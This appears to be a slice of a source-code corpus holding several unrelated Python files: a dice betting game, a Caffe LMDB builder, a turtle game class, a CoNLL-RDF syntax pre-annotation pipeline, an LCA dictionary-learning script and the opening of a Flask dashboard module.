        return "small"
    else:
        print("请重新下注!")
        return xiazhu()
def touzi_game():
    """Roll num_dice dice and compare the player's big/small bet against the total.

    Fix: rd.randrange(1, 6) never yields 6, so each die could only roll 1-5;
    use rd.randrange(1, 7) for a fair six-sided die.
    """
    num_dice = int(input("请输入想使用筛子的数量,(最多为6个) : "))
    if num_dice <= 0:
        print("筛子数量不能为0")
        touzi_game()
    elif num_dice > 6:
        print("筛子最多为6个")
        touzi_game()
    else:
        print("掷筛子游戏:{}个筛子!".format(num_dice))
        # totals at or above the midpoint count as "big"
        midNum = (num_dice * 6) / 2
        print("游戏规则如下:")
        print("大于等于{}为大,小余{}为小)".format(midNum, midNum))
        yours = xiazhu()
        print("你的下注是:", yours)
        # roll each die: 1..6 inclusive
        point_list = [0] * num_dice
        for slot in range(num_dice):
            point_list[slot] = rd.randrange(1, 7)
        for n in range(0, num_dice):
            print("骰子{}是{}".format(n + 1, point_list[n]))
        sum_point = sum(point_list)
        result = "big" if sum_point >= midNum else "small"
        print("总点数是", sum_point, result)
        # announce win/lose, then offer another round
        if yours == result:
            print("you win")
        else:
            print("you lose")
        start()
def start():
    """Ask whether to play another round; 1 starts touzi_game, anything else says goodbye."""
    jixu = int(input("继续玩游戏吗?(1是继续,0是结束)"))
    # print(type(jixu))
    if jixu == 1:
        print("》》》》游戏开始《《《《")
        touzi_game()
    else:
        print("欢迎再来!")
# Module entry point: begin the first round immediately.
start()
|
15,608 | 7582bd003f0220e4e79c4ecd31f7d3ca9ada0724 | import caffe
import os
import random

import cv2
import lmdb
import numpy as np
# Output directory for the generated LMDBs, created on demand (requires the os import).
savepath = '../data/'
if not os.path.exists(savepath):
    os.makedirs(savepath)
def crop_image(img):
    """Return a random 224x224 (H, W) window of img; img must be strictly larger than 224 on both axes."""
    crop_size = 224
    max_y = img.shape[0] - crop_size
    max_x = img.shape[1] - crop_size
    top = random.randrange(0, max_y)
    left = random.randrange(0, max_x)
    return img[top:top + crop_size, left:left + crop_size]
def scale(im):
    """Resize im to a fixed 256x256 (ignoring aspect ratio).

    Fix: everything after the first return in the original was unreachable --
    an aspect-preserving shortest-side-256 resize that could never run. The
    dead code is removed; behavior (fixed 256x256) is unchanged. If the
    aspect-preserving variant was the real intent, drop the first return
    instead.
    """
    return cv2.resize(im, (256, 256))
# Per-style picture lists: all files, then train/validate/test splits (20 style classes).
style_pic = {}
train_pic = {}
validate_pic = {}
test_pic = {}
for key in range(20):
    style_pic[key] = []
    train_pic[key] = []
    validate_pic[key] = []
    test_pic[key] = []
# train.txt / test.txt hold one "path label" pair per line.
with open('train.txt', 'r') as f:
    content = f.read()[:-1]
    for line in content.split('\n'):
        t = line.split(' ')
        style_pic[int(t[1])].append(t[0])
with open('test.txt', 'r') as f:
    content = f.read()[:-1]
    for line in content.split('\n'):
        t = line.split(' ')
        test_pic[int(t[1])].append(t[0])
# Shuffle each style and hold out its last 800 images for validation.
for style in style_pic:
    for i in range(30):
        random.shuffle(style_pic[style])
    train_pic[style] = style_pic[style][:-800]
    validate_pic[style] = style_pic[style][-800:]
train_num = 0
validate_num = 0
test_num = 0
for style in train_pic:
    train_num += len(train_pic[style])
for style in validate_pic:
    validate_num += len(validate_pic[style])
for style in test_pic:
    test_num += len(test_pic[style])
print train_num, validate_num, test_num
# Each image contributes crop_number random 224x224 crops.
crop_number = 4
# Train
count = 0
print 'Train total ' + str(train_num * crop_number)
# Shuffled key order so LMDB entries are not grouped by style.
index = sorted(range(0, train_num * crop_number), key=lambda x: random.random())
in_db = lmdb.open(savepath + 'flickr-train-lmdb', map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
    for style in train_pic:
        for pic in train_pic[style]:
            pic_data = scale(cv2.imread(pic))
            for _ in range(0, crop_number):
                cropped = crop_image(pic_data).transpose((2,0,1))  # HWC -> CHW for caffe
                im_dat = caffe.io.array_to_datum(cropped.astype('uint8'))
                im_dat.label = int(style)
                in_txn.put('{:0>10d}'.format(index.pop()), im_dat.SerializeToString())
                count += 1
                if count % 10000 == 0:
                    print count
assert(count == train_num * crop_number)
in_db.close()
# Validate
count = 0
print 'Validate total ' + str(validate_num * crop_number)
index = sorted(range(0, validate_num * crop_number), key=lambda x: random.random())
in_db = lmdb.open(savepath + 'flickr-validate-lmdb', map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
    for style in validate_pic:
        for pic in validate_pic[style]:
            pic_data = scale(cv2.imread(pic))
            for _ in range(0, crop_number):
                cropped = crop_image(pic_data).transpose((2,0,1))
                im_dat = caffe.io.array_to_datum(cropped.astype('uint8'))
                im_dat.label = int(style)
                in_txn.put('{:0>10d}'.format(index.pop()), im_dat.SerializeToString())
                count += 1
                if count % 10000 == 0:
                    print count
assert(count == validate_num * crop_number)
in_db.close()
# Test
count = 0
# NOTE(review): the banner prints test_num, but the loop below writes
# test_num * crop_number entries (see the final assert) -- confirm which is intended.
print 'Test total ' + str(test_num)
in_db = lmdb.open(savepath + 'flickr-test-lmdb', map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
    for style in test_pic:
        for pic in test_pic[style]:
            pic_data = scale(cv2.imread(pic))
            for _ in range(0, crop_number):
                cropped = crop_image(pic_data).transpose((2,0,1))
                im_dat = caffe.io.array_to_datum(cropped.astype('uint8'))
                im_dat.label = int(style)
                in_txn.put('{:0>10d}'.format(count), im_dat.SerializeToString())
                count += 1
                if count % 10000 == 0:
                    print count
assert(count == test_num * crop_number)
in_db.close()
|
15,609 | 8fbe11ff028bcd406c12817ff481a36b3beb0497 | from turtle import Turtle
from random import randint
class Food(Turtle):
    """Snake-game food pellet: a small blue circle that jumps to a random board position."""

    def __init__(self):
        super().__init__()
        self.penup()  # never draw a trail when moving
        self.shape('circle')
        # default 20px circle scaled down to roughly 5px
        self.shapesize(stretch_len = 0.25, stretch_wid = 0.25)
        self.color('blue')
        self.speed(0)  # no movement animation
        self.refresh()  # place at an initial random position

    def refresh(self):
        # Jump to a random spot inside the play area.
        # NOTE(review): the y upper bound is 219 while the others are 230 -- confirm intended.
        self.goto(randint(-230, 230), randint(-230, 219))
|
15,610 | e81340d6d21dc25b0ac185c9150b14cb92c06bc3 | import os
import sys
import codecs
import re
from ansi2html import Ansi2HTMLConverter
from mtaac_package.CoNLL_file_parser import conll_file
from mtaac_package.common_functions import *
from cdliconll2conllu.converter import CdliCoNLLtoCoNLLUConverter
##from conllu.convert import convert as conllu2brat
from SPARQLTransformer import sparqlTransformer
'''
Not in use:
import rdflib
from SPARQLWrapper import SPARQLWrapper, JSON
'''
#
#---/ GENERAL COMMENTS /-------------------------------------------------------
#
'''
PIP DEPENDENCIES:
- mtaac_package (https://github.com/cdli-gh/mtaac-package)
- ansi2html
# - rdflib // not used
# - SPARQLWrapper // not used
OTHER DEPENDENCIES (Windows):
- http://www.oracle.com/technetwork/java/javase/downloads/
jdk8-downloads-2133151.html
WORKFLOW:
+ 1. CDLI-CoNLL (already there)
+ 2. CoNLL2RDF <https://github.com/acoli-repo/conll-rdf>
+ 3. RDF
+ 4. Syntactic Pre-annotator
+ 5. RDF2CoNLL
>? 6. CDLI-CoNLL2CoNLL-U
<https://github.com/cdli-gh/CDLI-CoNLL-to-CoNLLU-Converter)>
> 7. CoNLLU > Brat
8. Brat (push file to brat server)
(9. Editor corrects syntax)
10. Brat 2 CDLI-Conll
<https://github.com/cdli-gh/brat_to_cdli_CONLLconverter>
TODO:
+ check .sh scripts for missed steps
- columns should be adjusted for CDLI-CoNLL:
ID WORD MORPH2 POS IGNORE IGNORE IGNORE
- make sure columns are correctly designated for both formats
- make sure abbreviations are unified:
- either different rules for different abbreviations
OR
- better:
- apply your own abbr. unifier (lemmatization data scripts)
to make the data unified.
- then insure that the abbr. in SPARQL match
- Find a solution for rendering words in SPARQL.
Perhaps, FLASK templates would be the best solution also to corpus-specific
placeholders' rendering.
'''
#
#---/ ANSI 2 HTML /------------------------------------------------------------
#
a2h_conv = Ansi2HTMLConverter()
#
#---/ Variables /--------------------------------------------------------------
#
_path = os.path.dirname(os.path.abspath(__file__))
sp = subprocesses()
#
#---/ CDLI-CoNLL > CONLL-U /---------------------------------------------------
#
class CC2CU(common_functions, CdliCoNLLtoCoNLLUConverter):
    '''
    Wrapper around CDLI-CoNLL-to-CoNLLU-Converter:
    https://github.com/cdli-gh/CDLI-CoNLL-to-CoNLLU-Converter
    '''
    GIT_CC2CU = 'https://github.com/cdli-gh/CDLI-CoNLL-to-CoNLLU-' \
                'Converter.git'

    def __init__(self):
        # Label the upstream converter uses in its diagnostics.
        self.cdliCoNLLInputFileName = 'CoNLL data'
        ## self.install_or_upgrade_CC2CU()
        self.__reset__()
        from cdliconll2conllu.mapping import Mapping
        self.cl = Mapping()
        # CoNLL-U column header line, e.g. '#ID\tFORM\t...'
        self.header = '#%s' % '\t'.join(self.cl.conllUFields)

    def install_or_upgrade_CC2CU(self):
        '''
        Install CC2CU if missing or upgrade it.
        '''
        sp.run(['pip', 'install', 'git+' + self.GIT_CC2CU, '--upgrade'])

    def convert_from_str(self, conll_str):
        '''
        Convert CDLI-CoNLL to CoNLL-U from a CoNLL string and return the result.

        Fix: header detection used l[0] == '#', which raises IndexError on
        blank lines (conll_str.splitlines() can yield empty strings after
        strip()); startswith() is safe on empty strings.
        '''
        lines_all = [l.strip() for l in conll_str.splitlines()]
        headerLines = [l for l in lines_all if l.startswith('#')]
        inputLines = [l.split('\t') for l in lines_all
                      if l not in headerLines + ['']]
        # Replace a trailing header row that already holds tab-separated column names.
        if '\t' in headerLines[-1]:
            headerLines = headerLines[:-1]
        headerLines.append(self.header)
        self.convertCDLICoNLLtoCoNLLU(inputLines)
        conll_str = '\n'.join(
            headerLines + ['\t'.join(l) for l in self.outputLines])
        self.__reset__()
        return conll_str

    def convert_from_file(self, filename):
        '''
        Convert CDLI-CoNLL to CoNLL-U from file via the CLI tool.
        '''
        sp.run(['cdliconll2conllu', '-i', filename, '-v'], print_stdout=False)
# Module-level converter instance reused by syntax_preannotation.preannotate.
cdli_conll_u = CC2CU()
#---/ CONLL-U <> CONLL-RDF /---------------------------------------------------
#
class CoNLL2RDF(common_functions):
    '''
    Wrapper around CoNLL-RDF:
    https://github.com/acoli-repo/conll-rdf

    Locates a Java installation (Windows-only logic), clones and compiles
    the CoNLL-RDF tool chain, and shells out to its stream tools.
    '''
    GIT_CONLLRDF = 'https://github.com/acoli-repo/conll-rdf.git'
    CONLLRDF_PATH = os.path.join(_path, 'conll-rdf')
    def __init__(self):
        '''
        Ensure Java is on PATH and CoNLL-RDF is cloned and compiled.
        '''
        self.add_java_path()
        if not os.path.exists(self.CONLLRDF_PATH):
            self.install_CONLLRDF()
    def add_java_path(self):
        '''
        Windows: Find and add Java/JDK/bin path to env.

        NOTE(review): several suspected defects here — confirm intent:
        - if no 'Java' dir exists under either Program Files root,
          ´self.JAVA_JDK_PATH´ is never assigned, so the ´if not
          self.JAVA_JDK_PATH´ test raises AttributeError;
        - ´jre_lst[-1]´ raises IndexError when a JDK exists but no JRE;
        - the PATH appends have no ´os.pathsep´ separator;
        - the elif chain only appends the JRE path when the JDK path is
          already present in PATH.
        '''
        self.JAVA_PATH = None
        for b in ['', ' (x86)']:
            pf = os.environ['ProgramFiles'].replace(b, '')
            basic_java_path = os.path.join(pf, 'Java')
            if os.path.exists(basic_java_path):
                dirs_lst = os.listdir(basic_java_path)
                jdk_lst = [jdk for jdk in dirs_lst if 'jdk' in jdk]
                jre_lst = [jre for jre in dirs_lst if 'jre' in jre]
                if jdk_lst!=[]:
                    self.JAVA_JDK_PATH = \
                        os.path.join(basic_java_path, jdk_lst[-1], 'bin')
                    self.JAVA_JRE_PATH = \
                        os.path.join(basic_java_path, jre_lst[-1], 'bin')
                    break
        if not self.JAVA_JDK_PATH:
            print(
                '''No Java Development Kit installation found! '''
                '''Download and install latest:\n'''
                '''http://www.oracle.com/technetwork/'''
                '''java/javase/downloads/index.html''')
            return False
        elif self.JAVA_JDK_PATH not in sp.env['PATH']:
            sp.env['PATH']+=self.JAVA_JDK_PATH
        elif self.JAVA_JRE_PATH not in sp.env['PATH']:
            sp.env['PATH']+=self.JAVA_JRE_PATH
        self.JAVAC_PATH = os.path.join(self.JAVA_JDK_PATH, 'javac.exe')
        return True
    def install_CONLLRDF(self):
        '''
        Install CoNLL-RDF:
        1. Clone Github repo
        2. Build Java libs
        '''
        sp.run(['git', 'clone', self.GIT_CONLLRDF])
        self.compile_CONLLRDF()
    def compile_CONLLRDF(self):
        '''
        Compile CoNLL-RDF Java libraries.

        Only the three tools listed in ´dep_dict´ are compiled; each is
        built together with its single dependency source file.
        '''
        dep_dict = {
            'CoNLLStreamExtractor': 'CoNLL2RDF',
            'CoNLLRDFAnnotator': 'CoNLLRDFFormatter',
            'CoNLLRDFUpdater': 'CoNLLRDFViz'
            }
        src_path = os.path.join(
            self.CONLLRDF_PATH, 'src', 'org', 'acoli', 'conll', 'rdf')
        target_path = os.path.join(self.CONLLRDF_PATH, 'bin')
        if not os.path.exists(target_path):
            os.mkdir(target_path)
        # Classpath string (lib jars + bin) with absolute paths; the
        # command list's last element is the classpath value.
        cp_vars = self.java_command(full_path=True, include_bin=True)[-1]
        for f in os.listdir(src_path):
            if '.java' in f and f.replace('.java', '') in dep_dict.keys():
                src_files_path = os.path.join(src_path, f)
                dep_src_file_path = os.path.join(src_path,
                    dep_dict[f.replace('.java', '')])
                src_files_lst = [src_files_path, dep_src_file_path+'.java']
                cp_path = cp_vars
                self.compile_java(src_files_lst,
                                  target_path,
                                  cp_path)
    def compile_java(self, src_files_lst, target_path, cp_path, cwd_path=None):
        '''
        Run Java compiler with command.

        ´-d´ sets the class output dir, ´-g´ adds debug info, ´-cp´ the
        classpath built by ´java_command´.
        '''
        self.run([r'%s' %self.JAVAC_PATH,
                  '-d', r'%s' %target_path,
                  '-g',
                  '-cp', r'%s' %cp_path,
                  ]+[r'%s' %f for f in src_files_lst],
                 cwd_path=cwd_path)
    def conll2rdf(self, f_path, columns_typ):
        '''
        Run Java CoNNL2RDF script to convert CoNLL file to RDF.

        NOTE(review): this method looks unfinished — ´command´ is built
        but never executed, ´self.columns´ is not assigned anywhere in
        this class, and ´rdf_str´ is undefined when passed to
        ´dump_rdf´ (NameError if called). Confirm before use.
        '''
        #self.define_columns(columns_typ)
        command = self.CoNLLStreamExtractor_command() + ['../data/'] \
                  + self.columns
        self.dump_rdf(rdf_str, f_path)
    def rdf2conll(self, columns, f_path=None, stdin_str=None,
                  decode_stdout=False, target_path=None):
        '''
        Run the Java CoNLLRDFFormatter to convert RDF back to CoNLL.

        Pass either ´f_path´ (used as working directory for ´run´) or
        ´stdin_str´ (RDF fed on stdin). Returns the CoNLL string, and
        also dumps it to ´target_path´ when given.
        '''
        #self.define_columns(columns_type)
        if f_path==None and stdin_str==None:
            print('rdf2conll wrapper: specify path OR string.')
            return None
        command = self.CoNLLRDFFormatter_command() + ['-conll'] \
                  + columns
        (CONLLstr, errors) = self.run(
            command,
            cwd_path=f_path,
            stdin_str=stdin_str,
            decode_stdout=True)
        # Re-break '#' comment markers onto their own lines and collapse
        # the resulting double blank lines.
        CONLLstr = CONLLstr.replace(' #', ' \n#') \
                   .replace('\t#', '\n#').replace('\n\n', '\n')
        if target_path:
            self.dump(CONLLstr, target_path)
        return CONLLstr
    def get_stdin(self, stdin_path=None, stdin_str=None): #escape_unicode=False
        '''
        Get stdin from path or string to use with run.

        Returns UTF-8 encoded bytes (empty bytes when neither source is
        given). ETCSRI .conll files get corpus-specific conversion first.
        '''
        stdin = ''
        if stdin_path==None and stdin_str==None:
            return b''
        if stdin_path:
            with codecs.open(stdin_path, 'r', 'utf-8') as file:
                stdin = file.read()
            if 'etcsri' in stdin_path and '.conll' in stdin_path:
                stdin = self.convert_ETCSRI(stdin)
        elif stdin_str:
            stdin = stdin_str
        if type(stdin)!=bytes:
            stdin = stdin.encode('utf-8')
##        if escape_unicode==True:
##            stdin = self.standardize_translit(stdin)
        return stdin
    def run(self, command, cwd_path=None, stdin_path=None, stdin_str=None,
            decode_stdout=True):#, escape_unicode=False
        '''
        Open file, load it to stdin, run command, return stdout.

        Defaults the working directory to the CoNLL-RDF checkout and
        returns the (stdout, errors) pair produced by ´filter_errors´.
        '''
        stdin = self.get_stdin(
            stdin_path, stdin_str)#, escape_unicode=escape_unicode)
        if not cwd_path:
            cwd_path=self.CONLLRDF_PATH
        stdout = sp.run(
            command,
            cwd=cwd_path,
            stdin=stdin,
            print_stdout=False,
            decode_stdout=decode_stdout
            )
        return self.filter_errors(stdout)
    def filter_errors(self, stdout):
        '''
        Return (real_result, errors_or_warnings).

        Splits subprocess output into payload lines and Java / log4j /
        Apache / ACoLi log noise, preserving the input's str/bytes type.
        '''
        shell_markers = [b'java.', b'log4j', b'org.apache', b'org.acoli']
        typ = type(stdout)
        if typ==str:
            stdout = stdout.encode('utf-8')
        shell_lst = []
        for b in stdout.split(b'\n'):
            for m in shell_markers:
                if m in b:
                    shell_lst.append(b)
                    break
        stdout_lst = [b for b in stdout.split(b'\n') if b not in shell_lst]
        if typ==bytes:
            errors = b'\n'.join(shell_lst)
            stdout = b'\n'.join(stdout_lst)
        elif typ==str:
            errors = b'\n'.join(shell_lst).decode('utf-8')
            stdout = b'\n'.join(stdout_lst).decode('utf-8')
        return (stdout, errors)
    def CoNLLStreamExtractor_command(self):
        '''
        Return a list containing basic command to run CoNLLStreamExtractor
        with no additional arguments.
        '''
        # Make command to run CoNLL2RDF with java
        return self.java_command()+['org.acoli.conll.rdf.CoNLLStreamExtractor']
    def CoNLLRDFFormatter_command(self):
        '''
        Return a list containing basic command to run CoNLLRDFFormatter
        with no additional arguments.
        '''
        # Make command to run CoNLL2RDF with java
        return self.java_command()+['org.acoli.conll.rdf.CoNLLRDFFormatter']
    def java_command(self, full_path=False, include_bin=True):
        '''
        Return a list containing basic java command to the library.
        Set path to 'full' to get full path output.

        NOTE(review): the classpath uses ';' as separator, which is
        Windows-only; POSIX systems need ':' (os.pathsep).
        '''
        # Prepare java variables
        dest = 'bin'
        lib_path = os.path.join(self.CONLLRDF_PATH, 'lib')
        if full_path==False:
            libs = ';'.join(
                ['lib/%s' %l for l in os.listdir(lib_path)
                 if '.jar' in l])
        elif full_path==True:
            dest = os.path.join(self.CONLLRDF_PATH, dest)
            libs = ';'.join(
                [os.path.join(lib_path, l) for l in os.listdir(lib_path)
                 if '.jar' in l])
        # Make command to run CoNLL2RDF with java
        cp = libs
        if include_bin==True:
            cp = ';'.join([dest, libs])
        return ['java', '-cp', cp]
    def dump_rdf(self, rdf_str, f_path):
        '''
        Receive original path and rdf string, dump to file.
        '''
        # Keep only the payload from the first '#new_text' marker on.
        rdf_str = "#new_text" + rdf_str.split("#new_text")[1]
        filename = f_path.split('/')[-1].split('.')[0]+'.ttl'
        dump_path = os.path.join(_path, 'data', 'conll-rdf', filename)
        self.dump(rdf_str, dump_path)
#---/ SYNTAX PREANNOTATION /---------------------------------------------------
#
class syntax_preannotation(CoNLL2RDF):
    '''
    Class to preannotate turtle files with SPARQL update queries.
    Extends ´CoNLL2RDF´.
    '''
    # Ordered pipeline of (SPARQL file basename, repeat count) pairs
    # applied by ´load_requests´ / ´preannotate´. A repeat count of None
    # means "no {n} suffix".
    REQUEST_SRC = [
        ('remove-IGNORE', 0),
        ('extract-feats', 1),
        ('remove-MORPH2', 0),
        ('init-SHIFT', 1),
##        ('REDUCE-adjective', 3),
##        ('REDUCE-math-operators', 1), # <- additional rules for admin -
##        ('REDUCE-numerals-chain', 6),
##        ('REDUCE-time-num', 1),
##        ('REDUCE-measurements', 1), # -->
##        ('REDUCE-compound-verbs', 1),
##        ('REDUCE-adnominal', 3),
##        ('REDUCE-appos', 1),
##        ('REDUCE-absolutive', 1),
##        ('REDUCE-appos', 1), # again?
##        ('REDUCE-adjective', 1), # again?
##        ('REDUCE-appos', 4), # again?
##        ('REDUCE-preposed-genitive', 1),
##        ('REDUCE-arguments', 5), # again?
##        ('REDUCE-adjective', 1), # again?
##        ('REDUCE-to-HEAD', 1),
##        ('remove-feats', 1),
        ('create-ID-and-DEP', 1),
        ('create-_HEAD', 1)
        ]
    #other possible rules:
    # PN <-- N (as in & instead of PN lugal)
    # reduce remaining nouns to first verb as nmod (?)
    # mu <-- V.MID
    #                   (NU)
    #                    |
    #            (ADJ)  NU
    #               \   /
    #               UNIT\
    #         (...)/     \        (NU)
    #      ____________BASE__/
    #     /    |     |    |   \
    #    u4    ki  giri  iti  (us)
    #    |     |     |    |     |
    #    NU    PN   PN (diri)  mu
    #    |     |          |     \
    #  (...) (...)        MN    V.MID--...
    #
    #
    REQUEST_REMOVE_IGNORE = [
        ('remove-IGNORE', 1)
        ]
    SPARQL_PATH = os.path.join(_path, 'syntax-preannotation', 'sparql')
    OUTPUT_PATH = os.path.join(_path, 'data', 'conll-preannotated')
    def __init__(self):
        '''
        Initialise the underlying CoNLL-RDF wrapper (Java setup,
        checkout/compile when missing).
        '''
        CoNLL2RDF.__init__(self)
    def load_requests(self, requests=None):
        '''
        Load SPARQL request specifiers for CoNLLStreamExtractor.

        Each entry becomes "<SPARQL_PATH>/<name>.sparql{repeats}"; the
        "{n}" suffix is omitted when the repeat count is None.

        Arguments:
            requests: list of (name, repeats) pairs; defaults to
                ´self.REQUEST_SRC´ when omitted or empty.
        '''
        # None default instead of a mutable []; an explicit empty list
        # still selects the default, as before.
        if not requests:
            requests = self.REQUEST_SRC
        requests_lst = []
        for name, repeats in requests:
            # The previous version left ´repeat´ unbound (NameError) or
            # stale from an earlier iteration when repeats was None.
            repeat = '{%s}' % repeats if repeats is not None else ''
            # os.path.join for portability (the old literal backslash
            # separator was Windows-only).
            requests_lst.append(
                os.path.join(self.SPARQL_PATH, '%s.sparql' % name) + repeat)
        return requests_lst
    def preannotate(self, f_path):
        '''
        Run SPARQL preannotation on one CoNLL file.
        First command converts CoNLL to RDF and applies preannotation
        rules to it. The second converts the file back to CoNLL, then
        the result is converted to CoNLL-U and dumped to OUTPUT_PATH.
        '''
        columns = [
            'ID_NUM', 'FORM', 'BASE', 'MORPH2',
            'POS', 'EPOS', 'HEAD', 'DEP', 'EDGE']
        corpus = 'cdli'
        override = {}
        if 'etcsri' in f_path:
            # ETCSRI files carry ATF forms under a differently-named column.
            corpus = 'etcsri'
            columns = [
                'ID_NUM', 'FORM_ATF', 'BASE', 'MORPH2',
                'POS', 'EPOS', 'HEAD', 'DEP', 'EDGE']
            override = {
                'FORM_ATF': 'FORM'}
        c = conll_file(path=f_path, corpus=corpus)
        c.configure_str_output(columns, override=override)
        rdf_str = self.convert_to_conll_and_preannotate(c)
        filename, target_path, target_path_tree = self.get_path_data(f_path)
        self.tree_output(rdf_str, target_path_tree)
        conll_str = self.rdf2conll(columns=c.override_columns,
                                   stdin_str=rdf_str, decode_stdout=False)
        c.merge_columns_from_conll_str(conll_str, ['HEAD', ('EDGE', 'DEPREL')])
        c.configure_str_output(['ID_NUM']+c.COLUMNS_CDLI[1:], override=override)
        # Convert to CoNLL-U via the module-level CC2CU instance.
        conll_u = cdli_conll_u.convert_from_str(str(c))+'\n'
        self.dump(conll_u, target_path)
    def get_path_data(self, f_path):
        '''
        Return (filename, output CoNLL path, output HTML tree path)
        for a given input file path.
        '''
        filename = os.path.basename(f_path)
        target_path = os.path.join(self.OUTPUT_PATH, filename)
        target_path_tree = os.path.join(
            self.OUTPUT_PATH, '%s_tree.html' %filename.split('.')[0])
        return filename, target_path, target_path_tree
    def convert_to_conll_and_preannotate(self, conll_obj):
        '''
        Convert CoNLL to RDF and preannotate with SPARQL.
        Returns the RDF output (bytes, since decode_stdout is False).
        '''
        # !TODO!
        # REPLACE ['http://oracc.museum.upenn.edu/etcsri/'] by context!
        command = self.CoNLLStreamExtractor_command() \
                  + ['http://oracc.museum.upenn.edu/etcsri/'] \
                  + conll_obj.override_columns + ['-u'] \
                  + self.load_requests()
        run_dict = {
            'command': command, 'stdin_str': str(conll_obj),
            'decode_stdout': False}
        (rdf_str, errors) = self.run(**run_dict)
        # Surface tool errors (e.g. "Error in Parsing Data: Incorrect
        # XPOSTAG at line: ...") so failing files are visible.
        print(errors)
        return rdf_str
    def tree_output(self, rdf_str, target_path=''):
        '''
        Return string with parsed RDF tree representation.
        Dump an HTML rendering to target_path when it is given.
        '''
        command = self.CoNLLRDFFormatter_command() + ['-grammar']
        (tree_str, errors) = \
            self.run(command, stdin_str=rdf_str, decode_stdout=True)
        tree_html = a2h_conv.convert(tree_str)
        tree_html = tree_html.replace('pre-wrap', 'pre')
        if target_path!='':
            self.dump(tree_html, target_path)
        return tree_str
#---/ COMMANDS /---------------------------------------------------------------
#
'''
Preannotate all files in data/etsri-conll-all, except all errors:
'''
##f_path = os.path.join(_path, 'data', 'etcsri-conll-all')
##sx = syntax_preannotation()
##for f in os.listdir(f_path):
##    try:
##        sx.preannotate(os.path.join(f_path, f))
##    except Exception as e:
##        raise e
##        pass
'''
Preannotate all files in data/cdli-conll-all, except all errors:
'''
#f_path = os.path.join(_path, 'data', 'etcsri-conll')
#f_path = os.path.join(_path, 'data', 'cdli-jinyan-non-admin') #'etcsri-conll-all')
f_path = os.path.join(_path, 'data', 'cdli-conll-all')
#f_path = os.path.join(_path, 'data', 'evaluate')
# Files already annotated (a *_tree.html exists next to each output .conll).
preannotated = os.listdir(os.path.join(_path, 'data', 'conll-preannotated'))
exclude = [pa.replace('_tree.html', '.conll') for pa in preannotated if '_tree.html' in pa]
from list_errors import list_files_with_errors
errors_list = list_files_with_errors() # files previously annotated with errors
sx = syntax_preannotation()
for f in os.listdir(f_path):
    # Re-run only files that previously failed; flip the condition to
    # ´f not in exclude´ to process everything not yet annotated.
    if f in errors_list: #f not in exclude
        # NOTE(review): ´raise e´ re-raises immediately, making this
        # try/except a no-op and the ´pass´ unreachable — presumably
        # left from toggling between fail-fast and skip-errors modes.
        try:
            sx.preannotate(os.path.join(f_path, f))
        except Exception as e:
            raise e
            pass
# Compare the error list before and after this run.
errors_list_new = list_files_with_errors()
print('old_errors', errors_list)
print('new_errors', errors_list_new)
#CC2CU()
#CoNLL2RDF()
#syntax_preannotation()
##c = CoNLL2RDF()
##c.rdf2conll("data\conll-rdf\P100188.ttl")
|
15,611 | 33ea1995a633cadad690139253c7d48b0253fe22 | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 24 16:31:30 2016
@author: Eric
"""
import argparse
import pickle
import LCALearner
import LCAmods
import numpy as np
import scipy.io as io
def _str2bool(text):
    """Parse a command-line boolean.

    argparse's ``type=bool`` is a trap: any non-empty string — including
    "False" — is truthy, so ``--pos False`` used to yield True. Parse the
    text explicitly instead.
    """
    return str(text).strip().lower() in ('1', 'true', 'yes', 'y', 't')

parser = argparse.ArgumentParser(description="Learn dictionaries for LCA with given parameters.")
parser.add_argument('-o', '--overcompleteness', default=4, type=float)
parser.add_argument('-d', '--data', default='images', type=str)
parser.add_argument('-r', '--resultsfolder', default='', type=str)
parser.add_argument('-s', '--savesuffix', default='', type=str)
parser.add_argument('-i', '--niter', default=200, type=int)
parser.add_argument('-l', '--lam', default=0.6, type=float)
parser.add_argument('--load', action='store_true')
parser.add_argument('--pos', default=False, type=_str2bool)
args = parser.parse_args()

data = args.data
resultsfolder = args.resultsfolder
oc = args.overcompleteness
savesuffix = args.savesuffix
niter = args.niter
lam = args.lam
load = args.load
pos = args.pos

# Positive-only coding uses the modified LCA variant.
if pos:
    Learner = LCAmods.PositiveLCA
else:
    Learner = LCALearner.LCALearner

if data == 'images':
    datafile = '../vision/Data/IMAGES.mat'
    numinput = 256
    numunits = int(oc*numinput)
    data = io.loadmat(datafile)["IMAGES"]
    if resultsfolder == '':
        resultsfolder = '../vision/Results/'
    lca = Learner(data, numunits, paramfile='dummy')
elif data == 'spectros':
    datafile = '../audition/Data/speech_ptwisecut'
    numinput = 200
    numunits = int(oc*numinput)
    with open(datafile+'_pca.pickle', 'rb') as f:
        mypca, origshape = pickle.load(f)
    data = np.load(datafile+'.npy')
    data = data/data.std()
    if resultsfolder == '':
        resultsfolder = '../audition/Results/'
    lca = Learner(data, numunits, datatype="spectro", pca=mypca,
                  stimshape=origshape, paramfile='dummy')
else:
    # Fail early with a clear message instead of a NameError on ´lca´ below.
    raise ValueError("Unknown --data option: %r (expected 'images' or 'spectros')" % data)

# Inference / learning hyperparameters.
lca.min_thresh = lam
lca.max_iter = 1
lca.niter = niter
lca.infrate = 0.01
lca.learnrate = 0.0005

savestr = resultsfolder+str(oc)+'OC' + str(lam) + savesuffix
if load:
    lca.load(savestr + '.pickle')
# NOTE(review): saved before training — presumably to pin the save path
# for the final parameterless lca.save(); confirm against LCALearner.
lca.save(savestr+'.pickle')
lca.run(ntrials=50000)
lca.run(ntrials=200000, rate_decay=.99995)
lca.save()
|
15,612 | f409d01479fadd84ee7e223cd70a76231b34cb08 | """
Analysis dashboards module.
"""
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import copy
from datetime import datetime, timedelta
import json
import logging
import re
import numpy as np
import pandas as pd
from flask_login import login_required
from flask import render_template, request
from sqlalchemy import and_
from app.dashboards import blueprint
from cropcore import queries
from cropcore.utils import (
download_csv,
parse_date_range_argument,
query_result_to_array,
)
from cropcore.structure import SQLA as db
from cropcore.structure import (
SensorClass,
TypeClass,
ReadingsAegisIrrigationClass,
ReadingsEnergyClass,
ReadingsAranetCO2Class,
ReadingsAranetTRHClass,
ReadingsAranetAirVelocityClass,
)
from cropcore.constants import CONST_MAX_RECORDS, CONST_TIMESTAMP_FORMAT
# Temperature constants.
# Bin edges in °C per farm zone; the 144.0 upper edge is presumably a
# catch-all sentinel well above any real reading — confirm.
TEMP_BINS = {
    "Propagation": [0.0, 20.0, 23.0, 25.0, 144.0],
